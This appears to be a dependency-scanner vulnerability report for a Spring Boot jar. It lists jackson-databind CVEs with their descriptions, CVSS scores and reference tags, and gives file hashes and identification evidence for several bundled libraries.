af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-12086 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-14439 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH,PRODUCT cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-25649 suppress
A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity. CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
OSSINDEX - [CVE-2020-25649] CWE-611: Improper Restriction of XML External Entity Reference ('XXE') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25649 OSSIndex - https://github.com/FasterXML/jackson-databind/issues/2589 af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY secalert@redhat.com - ISSUE_TRACKING,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36518 suppress
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2022-42003 suppress
In FasterXML jackson-databind before versions 2.13.4.1 and 2.12.17.1, resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
OSSINDEX - [CVE-2022-42003] CWE-502: Deserialization of Untrusted Data OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42003 OSSIndex - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020 OSSIndex - https://github.com/FasterXML/jackson-databind/issues/3590 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-42004 suppress
In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
OSSINDEX - [CVE-2022-42004] CWE-502: Deserialization of Untrusted Data OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42004 OSSIndex - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490 OSSIndex - https://github.com/FasterXML/jackson-databind/issues/3582 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-1000873 suppress
Fasterxml Jackson version Before 2.9.8 contains a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in Causes a denial-of-service (DoS). This attack appear to be exploitable via The victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-12384 suppress
FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2019-12814 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-35116 suppress
jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize it cannot be achieved by an external attacker. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (4.7) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.0/RC:R/MAV:A References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: jackson-datatype-jdk8-2.9.5.jarDescription:
Add-on module for Jackson (http://jackson.codehaus.org) to support
JDK 8 data types.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-datatype-jdk8-2.9.5.jar
MD5: c3ae868458aa70411434fc1b2e219aca
SHA1: 023e37f085279ba316c0df923513b81609e1d1f6
SHA256: b31178ec713672c6abe49809d9295663de7091e7e226c8cdbd58557100af9afc
Evidence Type Source Name Value Confidence Vendor file name jackson-datatype-jdk8 High Vendor jar package name datatype Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name jdk8 Highest Vendor Manifest automatic-module-name com.fasterxml.jackson.datatype.jdk8 Medium Vendor Manifest bundle-docurl https://github.com/FasterXML/jackson-modules-java8/jackson-datatype-jdk8 Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-jdk8 Medium Vendor Manifest implementation-build-date 2018-03-26 15:52:15+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.datatype Medium Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-datatype-jdk8 Low Vendor pom groupid com.fasterxml.jackson.datatype Highest Vendor pom name Jackson datatype: jdk8 High Vendor pom parent-artifactid jackson-modules-java8 Low Vendor pom parent-groupid com.fasterxml.jackson.module Medium Product file name jackson-datatype-jdk8 High Product jar package name datatype Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product jar package name jdk8 Highest Product Manifest automatic-module-name com.fasterxml.jackson.datatype.jdk8 Medium Product Manifest bundle-docurl https://github.com/FasterXML/jackson-modules-java8/jackson-datatype-jdk8 Low Product Manifest Bundle-Name Jackson datatype: jdk8 Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-jdk8 Medium Product Manifest implementation-build-date 2018-03-26 15:52:15+0000 Low Product Manifest Implementation-Title Jackson datatype: jdk8 High Product Manifest specification-title Jackson datatype: jdk8 Medium Product pom artifactid jackson-datatype-jdk8 Highest Product pom groupid com.fasterxml.jackson.datatype Highest Product pom name Jackson datatype: jdk8 High Product pom parent-artifactid jackson-modules-java8 Medium Product pom parent-groupid com.fasterxml.jackson.module Medium Version file version 2.9.5 High Version Manifest Bundle-Version 2.9.5 High Version Manifest Implementation-Version 2.9.5 High Version pom version 2.9.5 Highest
Related Dependencies spring-music-sqldb-1.0.jar: jackson-datatype-jsr310-2.9.5.jar spring-music-sqldb-1.0.jar: jackson-module-parameter-names-2.9.5.jar CVE-2018-1000873 suppress
Fasterxml Jackson version Before 2.9.8 contains a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in Causes a denial-of-service (DoS). This attack appear to be exploitable via The victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: jackson-datatype-joda-2.9.5.jarDescription:
Add-on module for Jackson (http://jackson.codehaus.org) to support
Joda (http://joda-time.sourceforge.net/) data types.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-datatype-joda-2.9.5.jar
MD5: ab7b5f38eb59384993e5e40360fb61aa
SHA1: 1bd3d90b030cd65bef68e6aa8fb01639ff2a516d
SHA256: 9538d51d47158e729fc3bfec018bd454de4231643251e4143c52bb12182f6ee7
Evidence Type Source Name Value Confidence Vendor file name jackson-datatype-joda High Vendor jar package name datatype Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name joda Highest Vendor Manifest automatic-module-name com.fasterxml.jackson.datatype.joda Medium Vendor Manifest bundle-docurl http://wiki.fasterxml.com/JacksonModuleJoda Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-joda Medium Vendor Manifest implementation-build-date 2018-03-26 16:35:14+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.datatype Medium Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-datatype-joda Low Vendor pom groupid com.fasterxml.jackson.datatype Highest Vendor pom name Jackson-datatype-Joda High Vendor pom parent-artifactid jackson-base Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url http://wiki.fasterxml.com/JacksonModuleJoda Highest Product file name jackson-datatype-joda High Product jar package name datatype Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product jar package name joda Highest Product Manifest automatic-module-name com.fasterxml.jackson.datatype.joda Medium Product Manifest bundle-docurl http://wiki.fasterxml.com/JacksonModuleJoda Low Product Manifest Bundle-Name Jackson-datatype-Joda Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-joda Medium Product Manifest implementation-build-date 2018-03-26 16:35:14+0000 Low Product Manifest Implementation-Title Jackson-datatype-Joda High Product Manifest specification-title Jackson-datatype-Joda Medium Product pom artifactid jackson-datatype-joda Highest Product pom groupid com.fasterxml.jackson.datatype Highest Product pom name Jackson-datatype-Joda High Product pom parent-artifactid jackson-base Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url http://wiki.fasterxml.com/JacksonModuleJoda Medium Version file version 2.9.5 High Version Manifest Bundle-Version 2.9.5 High Version Manifest Implementation-Version 2.9.5 High Version pom version 2.9.5 Highest
spring-music-sqldb-1.0.jar: jandex-2.0.3.Final.jarDescription:
Parent POM for JBoss projects. Provides default project build configuration. License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jandex-2.0.3.Final.jar
MD5: 77db6e55da888349f5466d2dcf150b14
SHA1: bfc4d6257dbff7a33a357f0de116be6ff951d849
SHA256: a3a65250cf954f102e74bab23df12540780878231195b585a7a86f4364a53727
Evidence Type Source Name Value Confidence Vendor file name jandex High Vendor hint analyzer vendor redhat Highest Vendor jar package name indexer Highest Vendor jar package name jandex Highest Vendor jar package name jboss Highest Vendor Manifest build-timestamp Tue, 2 Aug 2016 13:41:44 -0500 Low Vendor Manifest bundle-docurl http://www.jboss.org Low Vendor Manifest bundle-symbolicname org.jboss.jandex Medium Vendor Manifest implementation-url http://www.jboss.org/jandex Low Vendor Manifest Implementation-Vendor JBoss by Red Hat High Vendor Manifest Implementation-Vendor-Id org.jboss Medium Vendor Manifest os-arch x86_64 Low Vendor Manifest os-name Mac OS X Medium Vendor Manifest specification-vendor JBoss by Red Hat Low Vendor pom artifactid jandex Low Vendor pom groupid org.jboss Highest Vendor pom name Java Annotation Indexer High Vendor pom parent-artifactid jboss-parent Low Product file name jandex High Product jar package name indexer Highest Product jar package name jandex Highest Product jar package name jboss Highest Product Manifest build-timestamp Tue, 2 Aug 2016 13:41:44 -0500 Low Product Manifest bundle-docurl http://www.jboss.org Low Product Manifest Bundle-Name Java Annotation Indexer Medium Product Manifest bundle-symbolicname org.jboss.jandex Medium Product Manifest Implementation-Title Java Annotation Indexer High Product Manifest implementation-url http://www.jboss.org/jandex Low Product Manifest os-arch x86_64 Low Product Manifest os-name Mac OS X Medium Product Manifest specification-title Java Annotation Indexer Medium Product pom artifactid jandex Highest Product pom groupid org.jboss Highest Product pom name Java Annotation Indexer High Product pom parent-artifactid jboss-parent Medium Version Manifest Bundle-Version 2.0.3.Final High Version Manifest Implementation-Version 2.0.3.Final High Version pom parent-version 2.0.3.Final Low Version pom version 2.0.3.Final Highest
spring-music-sqldb-1.0.jar: javassist-3.22.0-GA.jarDescription:
Javassist (JAVA programming ASSISTant) makes Java bytecode manipulation
simple. It is a class library for editing bytecodes in Java.
License:
MPL 1.1: http://www.mozilla.org/MPL/MPL-1.1.html
LGPL 2.1: http://www.gnu.org/licenses/lgpl-2.1.html
Apache License 2.0: http://www.apache.org/licenses/ File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/javassist-3.22.0-GA.jar
MD5: 69f277ed4c6631e45ec4cacd0e6e46c6
SHA1: 3e83394258ae2089be7219b971ec21a8288528ad
SHA256: 59531c00f3e3aa1ff48b3a8cf4ead47d203ab0e2fd9e0ad401f764e05947e252
Evidence Type Source Name Value Confidence Vendor file name javassist High Vendor jar package name bytecode Highest Vendor jar package name javassist Highest Vendor Manifest bundle-symbolicname javassist Medium Vendor Manifest specification-vendor Shigeru Chiba, www.javassist.org Low Vendor pom artifactid javassist Low Vendor pom developer email adinn@redhat.com Low Vendor pom developer email chiba@javassist.org Low Vendor pom developer email kabir.khan@jboss.com Low Vendor pom developer email smarlow@redhat.com Low Vendor pom developer id adinn Medium Vendor pom developer id chiba Medium Vendor pom developer id kabir.khan@jboss.com Medium Vendor pom developer id scottmarlow Medium Vendor pom developer name Andrew Dinn Medium Vendor pom developer name Kabir Khan Medium Vendor pom developer name Scott Marlow Medium Vendor pom developer name Shigeru Chiba Medium Vendor pom developer org JBoss Medium Vendor pom developer org The Javassist Project Medium Vendor pom developer org URL http://www.javassist.org/ Medium Vendor pom developer org URL http://www.jboss.org/ Medium Vendor pom groupid org.javassist Highest Vendor pom name Javassist High Vendor pom organization name Shigeru Chiba, www.javassist.org High Vendor pom url http://www.javassist.org/ Highest Product file name javassist High Product jar package name bytecode Highest Product jar package name javassist Highest Product Manifest Bundle-Name Javassist Medium Product Manifest bundle-symbolicname javassist Medium Product Manifest specification-title Javassist Medium Product pom artifactid javassist Highest Product pom developer email adinn@redhat.com Low Product pom developer email chiba@javassist.org Low Product pom developer email kabir.khan@jboss.com Low Product pom developer email smarlow@redhat.com Low Product pom developer id adinn Low Product pom developer id chiba Low Product pom developer id kabir.khan@jboss.com Low Product pom developer id scottmarlow Low Product pom developer name Andrew Dinn Low Product pom developer name Kabir Khan Low Product pom developer name Scott Marlow Low Product pom developer name Shigeru Chiba Low Product pom developer org JBoss Low Product pom developer org The Javassist Project Low Product pom developer org URL http://www.javassist.org/ Low Product pom developer org URL http://www.jboss.org/ Low Product pom groupid org.javassist Highest Product pom name Javassist High Product pom organization name Shigeru Chiba, www.javassist.org Low Product pom url http://www.javassist.org/ Medium Version Manifest specification-version 3.22.0-GA High Version pom version 3.22.0-GA Highest
spring-music-sqldb-1.0.jar: javax.annotation-api-1.3.2.jarDescription:
Common Annotations for the JavaTM Platform API License:
CDDL + GPLv2 with classpath exception: https://github.com/javaee/javax.annotation/blob/master/LICENSE File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/javax.annotation-api-1.3.2.jar
MD5: 2ab1973eefffaa2aeec47d50b9e40b9d
SHA1: 934c04d3cfef185a8008e7bf34331b79730a9d43
SHA256: e04ba5195bcd555dc95650f7cc614d151e4bcd52d29a10b8aa2197f3ab89ab9b
